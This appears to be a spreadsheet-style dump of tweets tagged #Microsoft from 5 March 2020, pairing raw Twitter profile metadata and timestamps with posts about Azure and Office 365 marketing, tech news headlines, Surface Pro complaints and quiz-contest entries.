    <t>{'id': 340005088, 'id_str': '340005088', 'name': 'Acumor', 'screen_name': 'acumor', 'location': 'Los Angeles', 'description': 'Acumor is a full service, IT consulting firm specializing in migrating businesses to cloud technologies and providing cloud-based custom application development', 'url': 'https://t.co/Tcgr9xg3SG', 'entities': {'url': {'urls': [{'url': 'https://t.co/Tcgr9xg3SG', 'expanded_url': 'https://acumor.com', 'display_url': 'acumor.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 323, 'friends_count': 774, 'listed_count': 96, 'created_at': 'Fri Jul 22 00:34:03 +0000 2011', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7967,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'http://pbs.twimg.com/profile_images/1150396356168540160/2kuxf5nK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1150396356168540160/2kuxf5nK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/340005088/1563110812',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</si>
  <si>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Thu Mar 05 19:04:12 +0000 2020</t>
  </si>
  <si>
    <t>Researchers Find 670+ Microsoft Subdomains Vulnerable to Takeover https://t.co/1mmNZS9bss 
#Microsoft #subdomain #websecurity #vulnerability</t>
  </si>
  <si>
    <t>{'id': 46627703, 'id_str': '46627703', 'name': 'Information Warfare Center', 'screen_name': 'cyberintel', 'location': 'Colorado Springs', 'description': 'Jeremy Martin is a security researcher for IWC.\r\nWork focusing on Red Team penetration testing, Computer Forensics, and Cyber Warfare', 'url': 'http://t.co/0ZdTsV4IPP', 'entities': {'url': {'urls': [{'url': 'http://t.co/0ZdTsV4IPP', 'expanded_url': 'http://www.informationwarfarecenter.com', 'display_url': 'informationwarfarecenter.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 692, 'friends_count': 36, 'listed_count': 30, 'created_at': 'Fri Jun 12 10:52:54 +0000 2009', 'favourites_count': 19, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 26327,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'http://pbs.twimg.com/profile_images/1085252991744073728/ggLVB6Sh_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1085252991744073728/ggLVB6Sh_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/46627703/1423173596',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</si>
  <si>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19:04:06 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft #cloud  #Azure     Did you know migrating to Microsoft Azure can reduce your data center footprint 73%? Check out this infographic for an overview and contact Archon Security to learn more! https://t.co/9r5v4jfoyq</t>
  </si>
  <si>
    <t>Thu Mar 05 19:03:58 +0000 2020</t>
  </si>
  <si>
    <t>We've got your back! Get help putting #technology in your school through #Microsoft's online tools. Select, deploy, and learn-it's easy as 1-2-3!     #EducationalTechnology #K12 #MicrosoftEducation #Windows10 https://t.co/napBfEVr8T</t>
  </si>
  <si>
    <t>{'id': 90406065, 'id_str': '90406065', 'name': 'InfiNet Solutions', 'screen_name': 'InfiNetOmaha', 'location': 'Omaha, NE', 'description': 'InfiNet is a full-service IT and Development company, helping clients leverage technology to improve and grow their business.', 'url': 'http://t.co/dZvovHdZd6', 'entities': {'url': {'urls': [{'url': 'http://t.co/dZvovHdZd6', 'expanded_url': 'http://www.omahait.com', 'display_url': 'omahait.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 321, 'friends_count': 386, 'listed_count': 21, 'created_at': 'Mon Nov 16 14:44:06 +0000 2009', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1033,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'http://pbs.twimg.com/profile_images/785696939513905152/YmsAHqx6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/785696939513905152/YmsAHqx6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/90406065/1476997028',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</si>
  <si>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Thu Mar 05 19:02:14 +0000 2020</t>
  </si>
  <si>
    <t>When you do something right, your employees let you know. Here's what NQCranes heard from administrators, technicians, &amp;amp; managers when they migrated to a #Microsoft cloud-based #ERP system. Watch now. #Technology #IT #BusinessAutomation https://t.co/Tu2jm3S4Yi</t>
  </si>
  <si>
    <t>{'id': 377871209, 'id_str': '377871209', 'name': 'Katpro Technologies', 'screen_name': 'kat_pro', 'location': 'Brandon, FL', 'description': 'Engage. Improve. Drive : Artificial Intelligence, ChatBots, SharePoint, .NET and Cloud platforms.', 'url': 'https://t.co/PnSireZsCO', 'entities': {'url': {'urls': [{'url': 'https://t.co/PnSireZsCO', 'expanded_url': 'http://www.katprotech.com', 'display_url': 'katprotech.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1087, 'friends_count': 933, 'listed_count': 168, 'created_at': 'Thu Sep 22 07:48:35 +0000 2011', 'favourites_count': 114, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6651,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'http://pbs.twimg.com/profile_images/676994922055118848/gEoXUewk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/676994922055118848/gEoXUewk_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/377871209/1450265204', 'profile_link_color': '4A913C',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</si>
  <si>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19:02:04 +0000 2020</t>
  </si>
  <si>
    <t>US threatens to pull big techs immunities if child abuse isnt curbed https://t.co/DQhLqcJvAU #Microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 19:00:43 +0000 2020</t>
  </si>
  <si>
    <t>Check out my article for #Microsoft. The country was in the midst of the great recession and by that afternoon I had joined the ranks of the unemployed. Now what? https://t.co/3yNKeVT3K7 #freelance</t>
  </si>
  <si>
    <t>Thu Mar 05 19:00:35 +0000 2020</t>
  </si>
  <si>
    <t>In a simulated phishing attack, over 10% of recipients clicked on a "nefarious" link. Younger students are often easier targets for phishing attacks, putting entire universities at risk. #Microsoft can help protect them. https://t.co/Gbh8Apav9c</t>
  </si>
  <si>
    <t>{'id': 281886208, 'id_str': '281886208', 'name': 'mediaFRIENDS Inc', 'screen_name': 'mediaFRIENDSS', 'location': 'Toronto ON Canada', 'description': '', 'url': 'https://t.co/pNDFoXHG8d', 'entities': {'url': {'urls': [{'url': 'https://t.co/pNDFoXHG8d', 'expanded_url': 'http://www.mediafriends.ca', 'display_url': 'mediafriends.ca', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 795, 'friends_count': 965, 'listed_count': 131, 'created_at': 'Thu Apr 14 04:55:05 +0000 2011', 'favourites_count': 17269, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 30056,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'http://pbs.twimg.com/profile_images/1337597941/100dpi_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1337597941/100dpi_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/281886208/1542812495',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</si>
  <si>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19:00:12 +0000 2020</t>
  </si>
  <si>
    <t>Researchers Find 670+ #Microsoft Subdomains Vulnerable to Takeover https://t.co/a8MJTUe7z8 #DarkReading</t>
  </si>
  <si>
    <t>{'id': 2475814386, 'id_str': '2475814386', 'name': 'Security News Bot', 'screen_name': 'SecurityNewsbot', 'location': 'Internet', 'description': 'Tweeting all things #InfoSec #Cybercrime #DDoS #Malware #Hackers #Vuln #Botnet and more.', 'url': 'http://t.co/GtNATaA2Uc', 'entities': {'url': {'urls': [{'url': 'http://t.co/GtNATaA2Uc', 'expanded_url': 'http://www.berzerk.org/newsbot', 'display_url': 'berzerk.org/newsbot', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 11799, 'friends_count': 9992, 'listed_count': 848, 'created_at': 'Sat May 03 18:08:14 +0000 2014', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 224777,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'http://pbs.twimg.com/profile_images/462655505765126144/pvX4XDcy_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/462655505765126144/pvX4XDcy_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2475814386/1399146859',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</si>
  <si>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18:59:12 +0000 2020</t>
  </si>
  <si>
    <t>Secure your Office 365 tenant in 5 area. Good information about identities management, information management, secure score etc #Office365 #Microsoft #Security #SecuriteITDay https://t.co/K56pFJE0yB https://t.co/w6Q7l3y2kv</t>
  </si>
  <si>
    <t>{'id': 296474638, 'id_str': '296474638', 'name': 'Jeff Angama', 'screen_name': 'jeffangama', 'location': 'Monaco', 'description': 'Blogger &amp; Digital Workplace Consultant. Here we serve #MicrosoftTeams #SharePoint #Office365 @ #MonacoDigital\nðŸ‡«ðŸ‡·ðŸ‡·ðŸ‡ªðŸ‡¨ðŸ‡³ ðŸ‡¸ðŸ‡¬  ðŸ‡²ðŸ‡¨', 'url': 'https://t.co/GoWu0Ae6zS', 'entities': {'url': {'urls': [{'url': 'https://t.co/GoWu0Ae6zS', 'expanded_url': 'https://jeffangama.wordpress.com', 'display_url': 'jeffangama.wordpress.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 871, 'friends_count': 1053, 'listed_count': 19, 'created_at': 'Tue May 10 20:35:00 +0000 2011', 'favourites_count': 3555, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3104,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'http://pbs.twimg.com/profile_images/1042492135386374146/o34CpPxR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1042492135386374146/o34CpPxR_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/296474638/1513164210', 'profile_link_color': '1B95E0',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</si>
  <si>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18:53:52 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft, EY, AMD: Big Names Join #DeFi Leaders on New #Ethereum Tool for Enterprises
https://t.co/j2zPMzuHcK https://t.co/1Vdu3w2T59</t>
  </si>
  <si>
    <t>Thu Mar 05 18:50:47 +0000 2020</t>
  </si>
  <si>
    <t>Love in a time of Corona Virus - Tips, Tricks and Best Practices for #WorkingRemotely #fiction #Practice https://t.co/UptoVKElxp #Microsoft #Office #Office365</t>
  </si>
  <si>
    <t>Thu Mar 05 18:50:13 +0000 2020</t>
  </si>
  <si>
    <t>If you need to learn for about Microsoft Cloud platform #Azure or if you need help with any #Microsoft certification or learn any Microsoft product, we can help.
You can comment this post or PM me and see how we can help.
We can provide one-on-one, grou...https://t.co/rzm25uBmO4</t>
  </si>
  <si>
    <t>Thu Mar 05 18:43:56 +0000 2020</t>
  </si>
  <si>
    <t>Top Alternative to QuickBooks Online for Growing Companies - Gravity Software https://t.co/7MwcRm5N9O by @vsilvani
#Restaurateurs #Operations #MsDynCRM #MsPartner #Cloud #ERP #Microsoft #CRM  #CPAs #CFO #FamilyBiz
#OrangeCounty #LosAngeles #SanDiego #SanFrancisco https://t.co/WhvkPOzweQ</t>
  </si>
  <si>
    <t>{'id': 3061888391, 'id_str': '3061888391', 'name': 'Gravity Software', 'screen_name': 'GoGravityOnline', 'location': 'Detroit, MI', 'description': 'Just say go!  Cloud Accounting Business Management Software Built on the Microsoft Power Platform   #Cloud #Accounting #Software #JustSayGo', 'url': 'https://t.co/0Wtxwh8H9n', 'entities': {'url': {'urls': [{'url': 'https://t.co/0Wtxwh8H9n', 'expanded_url': 'http://www.gogravity.com', 'display_url': 'gogravity.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1641, 'friends_count': 3910, 'listed_count': 483, 'created_at': 'Wed Feb 25 12:55:58 +0000 2015', 'favourites_count': 182, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 8667,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'http://pbs.twimg.com/profile_images/570983890639015936/v8jWTNkt_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/570983890639015936/v8jWTNkt_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3061888391/1560173650', 'profile_link_color': 'BF0707',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</si>
  <si>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18:41:23 +0000 2020</t>
  </si>
  <si>
    <t>EXCITING NEWS!!! Dean Dorton announces its partnership with #Microsoft 365 Business Central in order to deliver the future of #finance by expanding its suite of #accounting software. https://t.co/gtUpWXP4sf
https://t.co/zjbjRJc13s</t>
  </si>
  <si>
    <t>{'id': 1446292405, 'id_str': '1446292405', 'name': 'Dean Dorton', 'screen_name': 'DeanDorton', 'location': 'Lexington &amp; Louisville, KY \\ Raleigh, NC', 'description': 'One of the largest full-service accounting, technology, and consulting firms in the Southeast. Dean Dorton is the only firm to have on your team.', 'url': 'http://t.co/767c1uQXqr', 'entities': {'url': {'urls': [{'url': 'http://t.co/767c1uQXqr', 'expanded_url': 'http://www.deandorton.com', 'display_url': 'deandorton.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 595, 'friends_count': 337, 'listed_count': 30, 'created_at': 'Tue May 21 12:58:30 +0000 2013', 'favourites_count': 350, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2561, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '0E7049', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1157025599313141763/TMTYX3uq_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1157025599313141763/TMTYX3uq_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1446292405/1574266221', 'profile_link_color': '050505',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</si>
  <si>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18:41:05 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Airband: An annual update on connecting rural America https://t.co/7DSvgg7BYA</t>
  </si>
  <si>
    <t>{'id': 42980514, 'id_str': '42980514', 'name': 'Nuno Silva #WIMVP | IT-online', 'screen_name': 'n_silva', 'location': 'Portugal', 'description': 'IT Pro | Windows Insider MVP | Microsoft MVP - Windows Experience (2014-2016) | Microsoft Beta Tester (Windows Internacional Team) | MCC | Windows Phone Expert', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 508, 'friends_count': 293, 'listed_count': 426, 'created_at': 'Wed May 27 22:16:44 +0000 2009', 'favourites_count': 19937, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 45093, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '080607', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme2/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme2/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1213502986212773890/sGRh4Ct2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1213502986212773890/sGRh4Ct2_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/42980514/1398287639', 'profile_link_color': '512548', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '5BDEF2', 'profile_text_color': '617691', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 18:40:27 +0000 2020</t>
  </si>
  <si>
    <t>RPA Breaking Analysis - RPA Summary - who wins? 
https://t.co/zh430nCg6C
@theCUBE @dvellante @Wikibon #RPA #Microsoft #SAP #EnterpriseTech #theCUBEInsights #BreakingAnalysis #hyperautomation #processtransformation https://t.co/ClwqZayNoY</t>
  </si>
  <si>
    <t>{'id': 753074488648998912, 'id_str': '753074488648998912', 'name': 'theCUBE365', 'screen_name': 'theCUBE365', 'location': 'Palo Alto, CA', 'description': "Extending theCUBE, The ESPN of Tech, with 24x365 coverage of 'tech athletes' worldwide\n@siliconangle @thecube @wikibon #cubegems", 'url': 'https://t.co/wAuljfxXqC', 'entities': {'url': {'urls': [{'url': 'https://t.co/wAuljfxXqC', 'expanded_url': 'https://www.thecube.net', 'display_url': 'thecube.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1120, 'friends_count': 247, 'listed_count': 39, 'created_at': 'Wed Jul 13 03:52:04 +0000 2016', 'favourites_count': 931, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 10687,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'http://pbs.twimg.com/profile_images/753629379863781376/y1nD6T7W_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/753629379863781376/y1nD6T7W_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/753074488648998912/1548949920',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</si>
  <si>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18:40:19 +0000 2020</t>
  </si>
  <si>
    <t>Empowering digital transformation with .NET, ML and Azure | On .NET  https://t.co/1prCHFzPax  #Azure #Microsoft #azureflashnews</t>
  </si>
  <si>
    <t>{'id': 844555733987459073, 'id_str': '844555733987459073', 'name': 'Azure Flash News', 'screen_name': 'azureflashnews', 'location': 'Number 2, Briar', 'description': 'Weekly broadcast keeping viewers up to date on announcements regarding Microsoft Azure. Get the invite at: https://t.co/sT0yrdVZZw. OUR OPINIONS ARE OUR OWN.', 'url': 'https://t.co/ebfoQMnrDY', 'entities': {'url': {'urls': [{'url': 'https://t.co/ebfoQMnrDY', 'expanded_url': 'http://www.azureflashnews.com', 'display_url': 'azureflashnews.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/sT0yrdVZZw', 'expanded_url': 'http://aka.ms/afninvite', 'display_url': 'aka.ms/afninvite', 'indices': [107, 130]}]}}, 'protected': False, 'followers_count': 250, 'friends_count': 302, 'listed_count': 8, 'created_at': 'Wed Mar 22 14:25:52 +0000 2017', 'favourites_count': 88, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4108,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'http://pbs.twimg.com/profile_images/932646761080000512/UdJucW7P_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/932646761080000512/UdJucW7P_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/844555733987459073/1512483388',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</si>
  <si>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18:40:03 +0000 2020</t>
  </si>
  <si>
    <t>Researchers Find 670+ Microsoft Subdomains Vulnerable to Takeover https://t.co/Eu1EeGsNN3 
#Microsoft #subdomain #websecurity #vulnerability</t>
  </si>
  <si>
    <t>{'id': 17445813, 'id_str': '17445813', 'name': 'DarkReading', 'screen_name': 'DarkReading', 'location': 'Manhasset, NY', 'description': 'News and information on IT security, helping information security pros manage the balance between data protection and user access.', 'url': 'https://t.co/FnUjLnIOWW', 'entities': {'url': {'urls': [{'url': 'https://t.co/FnUjLnIOWW', 'expanded_url': 'http://www.DarkReading.com', 'display_url': 'DarkReading.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 223378, 'friends_count': 40, 'listed_count': 4760, 'created_at': 'Mon Nov 17 17:30:53 +0000 2008', 'favourites_count': 700, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 19925,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'http://pbs.twimg.com/profile_images/885169621795565573/A4mG0U5P_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/885169621795565573/A4mG0U5P_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/17445813/1542387020',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</si>
  <si>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18:39:57 +0000 2020</t>
  </si>
  <si>
    <t>Our Azure Virtual Machines guide continues this time explaining how to create a network security group and begin to deploy Virtual Machines under Azure. #Microsoft #HyperV https://t.co/bud5A894Ez</t>
  </si>
  <si>
    <t>Thu Mar 05 18:38:37 +0000 2020</t>
  </si>
  <si>
    <t>The EPAM Cloud Pipeline Released in the Microsoft Azure Marketplace #AzureMarketplace #MSPartner #Microsoft @AzureMktPlace https://t.co/3MsDbiW50P</t>
  </si>
  <si>
    <t>{'id': 2981339171, 'id_str': '2981339171', 'name': 'Brian Levenson', 'screen_name': 'brian_levenson', 'location': 'Redwood City, CA', 'description': 'Passionate about powerful and pleasant technology experiences. Product manager for Microsoft commercial marketplace. Photographer. New father.', 'url': 'https://t.co/yd6lzGihun', 'entities': {'url': {'urls': [{'url': 'https://t.co/yd6lzGihun', 'expanded_url': 'https://www.linkedin.com/in/brianlevenson/', 'display_url': 'linkedin.com/in/brianlevensâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 662, 'friends_count': 628, 'listed_count': 37, 'created_at': 'Fri Jan 16 16:11:29 +0000 2015', 'favourites_count': 3834, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2701,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'http://pbs.twimg.com/profile_images/818256527928590337/DWJH6opA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/818256527928590337/DWJH6opA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2981339171/1533340740',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</si>
  <si>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18:36:18 +0000 2020</t>
  </si>
  <si>
    <t>Why cant you make a reliable non glitching products like #apple?? Big question for Microsoft Surface pro team!!!! #Microsoft #MicrosoftLife #MicrosoftEdge</t>
  </si>
  <si>
    <t>{'id': 380687079, 'id_str': '380687079', 'name': 'Joe Dandan', 'screen_name': 'JoeDandan', 'location': 'Pleasant Prairie, WI', 'description': '26 - Adobe - Angular - React JS - AWS - Software Engineer - Chicago based - Tweets are my own opinion #MAGA', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 667, 'friends_count': 359, 'listed_count': 10, 'created_at': 'Tue Sep 27 02:06:56 +0000 2011', 'favourites_count': 446, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 785, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FCEBB6', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1179937360026460161/R3SuuIEc_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1179937360026460161/R3SuuIEc_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/380687079/1496095249', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': 'F0A830', 'profile_sidebar_fill_color': '78C0A8', 'profile_text_color': 'CE7834', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 18:36:03 +0000 2020</t>
  </si>
  <si>
    <t>ConsenSys and EY Roll Out #Ethereum Solution Protecting Business Secrets  #Microsoft, AMD, #ChainLink on Board
https://t.co/WLfx7kpGyQ https://t.co/WOxkqpUL88</t>
  </si>
  <si>
    <t>Thu Mar 05 18:35:08 +0000 2020</t>
  </si>
  <si>
    <t>@99_pvt A14
D) Washington
#99jobs #quizcontest #ContestIndia #ITquiz  #contest #Microsoft
Tagging @pareekothari @mr_adesara @jainusha30 @PreetiSanghavi1 @thakur1958</t>
  </si>
  <si>
    <t>{'id': 1103950275910426624, 'id_str': '1103950275910426624', 'name': 'Shaifali Kothari', 'screen_name': 'Skothari2481', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 204, 'friends_count': 1336, 'listed_count': 0, 'created_at': 'Fri Mar 08 09:27:10 +0000 2019', 'favourites_count': 4500, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3326, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1183117244936511488/YEU_1_PD_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1183117244936511488/YEU_1_PD_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1103950275910426624/1583424669',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</si>
  <si>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18:34:02 +0000 2020</t>
  </si>
  <si>
    <t>Does the Xbox Series X make gaming PCs obsolete? https://t.co/3FdfwtNuTg #Microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 18:33:59 +0000 2020</t>
  </si>
  <si>
    <t>I will literally never buy another #surfacepro these products are complete trash!!! #Microsoft #MicrosoftLife</t>
  </si>
  <si>
    <t>Thu Mar 05 18:33:24 +0000 2020</t>
  </si>
  <si>
    <t>Hmmm, HiTech hates #RemoteWork until they love it: "Stay Home: @Amazon, @Facebook, @Google, #Microsoft Tell #Seattle Workers" https://t.co/lFX85ENVGB via @NPR #COVID19 #COVID19seattle</t>
  </si>
  <si>
    <t>{'id': 17369964, 'id_str': '17369964', 'name': 'John S. Erickson', 'screen_name': 'olyerickson', 'location': '43.636828, -71.737928', 'description': '#rstats #DataScience #WebScience #SemanticWeb #Semantalytics @RPI (Newfound Lake, NH, USA)ðŸ§', 'url': 'https://t.co/B1d062WPKC', 'entities': {'url': {'urls': [{'url': 'https://t.co/B1d062WPKC', 'expanded_url': 'http://idea.rpi.edu', 'display_url': 'idea.rpi.edu', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 800, 'friends_count': 1017, 'listed_count': 112, 'created_at': 'Thu Nov 13 17:47:46 +0000 2008', 'favourites_count': 2735, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 17478, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F2EDC4', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1205664680/erickson_twit_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1205664680/erickson_twit_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/17369964/1490698485', 'profile_link_color': 'B31B1B', 'profile_sidebar_border_color': 'C99A18', 'profile_sidebar_fill_color': 'CCAC7E', 'profile_text_color': '61233B', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 18:33:19 +0000 2020</t>
  </si>
  <si>
    <t>#Future is now! futureproofn #microsoft Follow us for latest Info Does the Xbox Series X make gaming PCs obsolete? https://t.co/e03rK8bgwm</t>
  </si>
  <si>
    <t>Thu Mar 05 18:33:12 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft, Google, Facebook, and others join forces with law enforcement on child abuse crackdown https://t.co/RWUkaNdhr8 #ZDNet #Microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 18:32:00 +0000 2020</t>
  </si>
  <si>
    <t>@99_pvt A.13) C. ROM
#99jobs #quizcontest #ContestIndia #ITquiz  #contest #Microsoft
Join guys
@Soniyaskjain1 @Tanu7069 @ShilpiVarshne15 @shail2810 @Gurdeep0003 @SanjayJ45449140 @satyapaljain_86</t>
  </si>
  <si>
    <t>{'id': 1182884858399342593, 'id_str': '1182884858399342593', 'name': 'Sapna Varshney', 'screen_name': 'Sappy786', 'location': '', 'description': 'Contest Lover....Mom of two cute babies Loves to cook &amp; wanted to become  a blogger.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 195, 'friends_count': 1650, 'listed_count': 0, 'created_at': 'Sat Oct 12 05:05:14 +0000 2019', 'favourites_count': 7304, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6548, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1196933592024145920/3jt59CP-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1196933592024145920/3jt59CP-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1182884858399342593/1574206292',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</si>
  <si>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18:31:53 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Interview Questions | On Campus | Set 1 @ani_chaudhari https://t.co/4cmoAT0OeT</t>
  </si>
  <si>
    <t>{'id': 3672946310, 'id_str': '3672946310', 'name': 'CSEstack.org', 'screen_name': 'CSEStack', 'location': 'Bengaluru, India', 'description': 'Automatic Shares Content on Coding | Programming | Computer Science | Placement Interview - developers by @ani_chaudhari', 'url': 'https://t.co/zYpCQ2nTpV', 'entities': {'url': {'urls': [{'url': 'https://t.co/zYpCQ2nTpV', 'expanded_url': 'https://www.csestack.org', 'display_url': 'csestack.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 756, 'friends_count': 1293, 'listed_count': 18, 'created_at': 'Thu Sep 24 18:15:01 +0000 2015', 'favourites_count': 446, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 12865,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'http://pbs.twimg.com/profile_images/1210395899957874689/3AaiFpM8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1210395899957874689/3AaiFpM8_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3672946310/1486577279',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</si>
